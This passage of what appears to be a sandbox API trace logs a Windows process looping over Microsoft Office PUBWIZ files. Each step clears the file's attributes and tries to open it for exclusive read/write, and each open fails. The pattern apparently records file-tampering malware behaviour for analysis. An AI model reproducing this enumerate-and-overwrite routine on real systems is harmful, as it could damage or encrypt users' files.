dwFreeType=0x8000) returned 1 [0137.707] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.DPV", dwFileAttributes=0x80) returned 0 [0137.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.707] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML", dwFileAttributes=0x80) returned 0 [0137.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGNAVBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgnavbar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.708] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.DPV", dwFileAttributes=0x80) returned 0 [0137.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.708] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML", dwFileAttributes=0x80) returned 0 [0137.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPICCAP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpiccap.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.709] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.709] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.DPV", dwFileAttributes=0x80) returned 0 [0137.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.710] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML", dwFileAttributes=0x80) returned 0 [0137.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPQUOT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpquot.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.711] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.DPV", dwFileAttributes=0x80) returned 0 [0137.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.712] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.712] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML", dwFileAttributes=0x80) returned 0 [0137.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGPUNCT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgpunct.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.712] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.712] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.DPV", dwFileAttributes=0x80) returned 0 [0137.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.713] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML", dwFileAttributes=0x80) returned 0 [0137.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGREPFRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgrepfrm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.713] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.DPV", dwFileAttributes=0x80) returned 0 [0137.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.714] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.714] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.714] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.714] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML", dwFileAttributes=0x80) returned 0 [0137.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.715] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML", dwFileAttributes=0x80) returned 0 [0137.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSIDEBRV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgsidebrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.716] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML", dwFileAttributes=0x80) returned 0 [0137.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstory.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.716] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.716] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML", dwFileAttributes=0x80) returned 0 [0137.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGSTORYVERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgstoryvert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.717] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.717] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTEAR.DPV", dwFileAttributes=0x80) returned 0 [0137.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTEAR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtear.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.718] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.DPV", dwFileAttributes=0x80) returned 0 [0137.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.718] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML", dwFileAttributes=0x80) returned 0 [0137.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGTOC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgtoc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.719] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML", dwFileAttributes=0x80) returned 0 [0137.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.720] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV", dwFileAttributes=0x80) returned 0 [0137.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.721] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.721] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML", dwFileAttributes=0x80) returned 0 [0137.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.721] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.721] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.721] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.DPV", dwFileAttributes=0x80) returned 0 [0137.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.723] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML", dwFileAttributes=0x80) returned 0 [0137.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebcal.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.724] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.DPV", dwFileAttributes=0x80) returned 0 [0137.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.724] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML", dwFileAttributes=0x80) returned 0 [0137.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBHD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebhd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.725] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.725] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.DPV", dwFileAttributes=0x80) returned 0 [0137.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.725] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.725] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML", dwFileAttributes=0x80) returned 0 [0137.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.726] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML", dwFileAttributes=0x80) returned 0 [0137.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebref.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.727] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.DPV", dwFileAttributes=0x80) returned 0 [0137.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebsbr.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.728] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.728] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.728] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML", dwFileAttributes=0x80) returned 0 [0137.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML" (normalized: "c:\\program files\\microsoft 